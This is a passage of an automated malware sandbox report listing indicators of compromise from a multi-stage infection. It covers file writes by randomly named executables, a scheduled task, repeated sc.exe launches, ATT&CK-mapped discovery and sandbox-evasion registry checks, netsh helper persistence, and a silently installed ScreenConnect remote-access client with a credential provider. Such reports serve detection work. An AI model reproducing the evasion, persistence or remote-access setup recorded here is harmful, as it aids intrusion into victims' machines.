File created	C:\Windows\Installer\wix{F2D9E338-36BD-B769-CD92-1C2995F4239A}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB60C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB841.tmp	msiexec.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	1W48q9.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File created	C:\Windows\Installer\e58b514.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\ThinksMartin	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File created	C:\Windows\Installer\e58b512.msi	msiexec.exe
File created	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{F2D9E338-36BD-B769-CD92-1C2995F4239A}	msiexec.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6792	sc.exe
4904	sc.exe
13068	sc.exe
5392	sc.exe
6420	sc.exe
13236	sc.exe
5208	sc.exe
2624	sc.exe
3460	sc.exe
13084	sc.exe
6160	sc.exe
2952	sc.exe
13304	sc.exe
6640	sc.exe
6888	sc.exe
7088	sc.exe
6020	sc.exe
3704	sc.exe
6384	sc.exe
13180	sc.exe
3308	sc.exe
1772	sc.exe
5096	sc.exe
6200	sc.exe
6700	sc.exe
5940	sc.exe
2052	sc.exe
1584	sc.exe
2672	sc.exe
11616	sc.exe
6956	sc.exe
6876	sc.exe
632	sc.exe
6464	sc.exe
7128	sc.exe
9176	sc.exe
6560	sc.exe
13296	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	e8378438.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	e8378438.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2772	11164	WerFault.exe	192

System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A0v32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2z6609.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f73ae_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BIm18E9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WLbfHbp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7e9c4712.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e8378438.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BIm18E9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tool.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1W48q9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d3053f42c2c51006ff8ae62525ef2221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ba1405f49d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dBSGwVB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3g52f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000003061842c4a1469410000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800003061842c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809003061842c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d3061842c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000003061842c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3g52f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3g52f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
13132	timeout.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133874877438331242"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe

Modifies registry class 37 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductIcon = "C:\\Windows\\Installer\\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\\DefaultIcon"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Language = "1033"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9\Full	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Version = "402915332"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\PackageCode = "833E9D2FDB63967BDC29C192594F32A9"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open	msiexec.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4920	1W48q9.exe
4920	1W48q9.exe
6084	rapes.exe
6084	rapes.exe
3100	2z6609.exe
3100	2z6609.exe
3100	2z6609.exe
3100	2z6609.exe
3100	2z6609.exe
3100	2z6609.exe
1688	3g52f.exe
1688	3g52f.exe
1688	3g52f.exe
1688	3g52f.exe
1688	3g52f.exe
1688	3g52f.exe
544	chrome.exe
544	chrome.exe
4204	MSBuild.exe
4204	MSBuild.exe
4204	MSBuild.exe
4204	MSBuild.exe
1688	3g52f.exe
1688	3g52f.exe
1688	3g52f.exe
1688	3g52f.exe
1384	powershell.exe
1384	powershell.exe
1384	powershell.exe
1688	3g52f.exe
1688	3g52f.exe
13192	powershell.exe
13192	powershell.exe
13224	rapes.exe
13224	rapes.exe
13192	powershell.exe
2312	ba1405f49d.exe
2312	ba1405f49d.exe
2312	ba1405f49d.exe
2312	ba1405f49d.exe
2312	ba1405f49d.exe
2312	ba1405f49d.exe
1688	3g52f.exe
1688	3g52f.exe
856	msiexec.exe
856	msiexec.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
13096	ScreenConnect.ClientService.exe
11164	Exam.com
11164	Exam.com
11164	Exam.com
11164	Exam.com
11164	Exam.com
11164	Exam.com
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11916	rapes.exe
11916	rapes.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
11076	e8378438.exe
652	Process not Found
652	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2520	f73ae_003.exe
2520	f73ae_003.exe
2520	f73ae_003.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
4860	msedge.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	544	chrome.exe
Token: SeCreatePagefilePrivilege	544	chrome.exe
Token: SeShutdownPrivilege	544	chrome.exe
Token: SeCreatePagefilePrivilege	544	chrome.exe
Token: SeShutdownPrivilege	544	chrome.exe
Token: SeCreatePagefilePrivilege	544	chrome.exe
Token: SeShutdownPrivilege	544	chrome.exe
Token: SeCreatePagefilePrivilege	544	chrome.exe
Token: SeShutdownPrivilege	544	chrome.exe
Token: SeCreatePagefilePrivilege	544	chrome.exe
Token: SeShutdownPrivilege	544	chrome.exe
Token: SeCreatePagefilePrivilege	544	chrome.exe
Token: SeShutdownPrivilege	544	chrome.exe
Token: SeCreatePagefilePrivilege	544	chrome.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	13192	powershell.exe
Token: SeDebugPrivilege	8008	tool.exe
Token: SeShutdownPrivilege	3952	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3952	msiexec.exe
Token: SeSecurityPrivilege	856	msiexec.exe
Token: SeCreateTokenPrivilege	3952	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3952	msiexec.exe
Token: SeLockMemoryPrivilege	3952	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3952	msiexec.exe
Token: SeMachineAccountPrivilege	3952	msiexec.exe
Token: SeTcbPrivilege	3952	msiexec.exe
Token: SeSecurityPrivilege	3952	msiexec.exe
Token: SeTakeOwnershipPrivilege	3952	msiexec.exe
Token: SeLoadDriverPrivilege	3952	msiexec.exe
Token: SeSystemProfilePrivilege	3952	msiexec.exe
Token: SeSystemtimePrivilege	3952	msiexec.exe
Token: SeProfSingleProcessPrivilege	3952	msiexec.exe
Token: SeIncBasePriorityPrivilege	3952	msiexec.exe
Token: SeCreatePagefilePrivilege	3952	msiexec.exe
Token: SeCreatePermanentPrivilege	3952	msiexec.exe
Token: SeBackupPrivilege	3952	msiexec.exe
Token: SeRestorePrivilege	3952	msiexec.exe
Token: SeShutdownPrivilege	3952	msiexec.exe
Token: SeDebugPrivilege	3952	msiexec.exe
Token: SeAuditPrivilege	3952	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3952	msiexec.exe
Token: SeChangeNotifyPrivilege	3952	msiexec.exe
Token: SeRemoteShutdownPrivilege	3952	msiexec.exe
Token: SeUndockPrivilege	3952	msiexec.exe
Token: SeSyncAgentPrivilege	3952	msiexec.exe
Token: SeEnableDelegationPrivilege	3952	msiexec.exe
Token: SeManageVolumePrivilege	3952	msiexec.exe
Token: SeImpersonatePrivilege	3952	msiexec.exe
Token: SeCreateGlobalPrivilege	3952	msiexec.exe
Token: SeCreateTokenPrivilege	3952	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3952	msiexec.exe
Token: SeLockMemoryPrivilege	3952	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3952	msiexec.exe
Token: SeMachineAccountPrivilege	3952	msiexec.exe
Token: SeTcbPrivilege	3952	msiexec.exe
Token: SeSecurityPrivilege	3952	msiexec.exe
Token: SeTakeOwnershipPrivilege	3952	msiexec.exe
Token: SeLoadDriverPrivilege	3952	msiexec.exe
Token: SeSystemProfilePrivilege	3952	msiexec.exe
Token: SeSystemtimePrivilege	3952	msiexec.exe
Token: SeProfSingleProcessPrivilege	3952	msiexec.exe
Token: SeIncBasePriorityPrivilege	3952	msiexec.exe
Token: SeCreatePagefilePrivilege	3952	msiexec.exe
Token: SeCreatePermanentPrivilege	3952	msiexec.exe

Suspicious use of FindShellTrayWindow 60 IoCs

pid	Process
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
544	chrome.exe
4860	msedge.exe
4860	msedge.exe
3952	msiexec.exe
3952	msiexec.exe
11164	Exam.com
11164	Exam.com
11164	Exam.com
4616	bild.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
9652	chrome.exe
